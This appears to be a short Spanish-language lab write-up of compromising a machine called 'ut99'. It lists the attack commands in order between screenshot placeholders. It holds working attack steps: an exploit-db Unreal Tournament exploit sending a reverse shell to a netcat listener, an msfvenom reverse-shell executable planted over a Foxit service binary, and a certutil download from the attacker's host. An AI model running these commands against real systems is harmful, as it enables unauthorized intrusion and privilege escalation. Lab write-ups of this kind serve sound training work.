nmap -A -p- -oA ut99 192.168.198.44 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ut99 192.168.198.44

nmap -sU -O -p- -oA ut99-udp 192.168.198.44

nikto -h 192.168.198.44:80

` Pasted image 20210917192919.png

Pasted image 20210917193224.png

whatweb http://192.168.198.44

Pasted image 20210917193420.png

ftp 192.168.198.44

Nos logeamos con anonymous pero no funciona

Pasted image 20210917193348.png

http://192.168.198.44

Pasted image 20210917193606.png

searchsploit Unreal

searchsploit -m 16415.pl

https://www.exploit-db.com/exploits/16145

Pasted image 20210917193929.png

perl 16145.pl 192.168.198.44 7778 192.168.49.198 80

nc -lvnp 80

Pasted image 20210917194412.png

type local.txt

Pasted image 20210917194554.png

dir

Hacemos un dir en FTP y vemos Foxit

Pasted image 20210917194649.png

searchsploit -m 36390.txt

Pasted image 20210917194826.png

Hacemos un dir en Program Files (x86) y vemos Foxit

Pasted image 20210917195012.png

sc qc FoxitCloudUpdateService

Pasted image 20210917195118.png

Creamos un archivo hola.txt para ver si tenemos permisos

Pasted image 20210917195253.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.198 LPORT=80 -f exe -o Foxit.exe

Pasted image 20210917195534.png

python3 -m http.server 80

certutil.exe -f -urlcache -split http://192.168.49.198/Foxit.exe

Pasted image 20210917201917.png

shutdown.exe -r -f -t 1

nc -lvnp 80

Pasted image 20210917202057.png

whoami

Pasted image 20210917202321.png

boxes

copyright©2022 Cu3rv0x all rights reserved